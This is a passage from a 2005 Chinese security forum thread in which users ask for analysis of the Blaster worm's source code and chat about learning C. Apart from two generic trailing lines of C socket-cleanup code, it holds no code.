.status >= S_CONNECTING) close(connlist
.s); } exit(-1); }
作者:
所谓伊人
时间:
2005-4-1 10:52
标题:
求助!哪位高手分析过冲击波的源代码.
看不懂,不过俺也深受其害阿
作者:
xixiha
时间:
2005-4-1 11:33
标题:
求助!哪位高手分析过冲击波的源代码.
下面引用由
千與千尋
在
2005/03/30 04:34pm
发表的内容:
病毒源代码还是补定源代码`~ 你是做安全的还是?////
想拿来分析一下,了解一下这个病毒,先在这里谢过了.
作者:
雷震天
时间:
2005-4-1 12:17
标题:
求助!哪位高手分析过冲击波的源代码.
哇,楼主们都好历害啊。我也在好好在这学习。
作者:
好性情
时间:
2005-4-3 15:33
标题:
求助!哪位高手分析过冲击波的源代码.
你也学c啊?我也学,不过还很菜。有机会向你请教,可要帮忙哦。
欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/)
Powered by Discuz! 7.2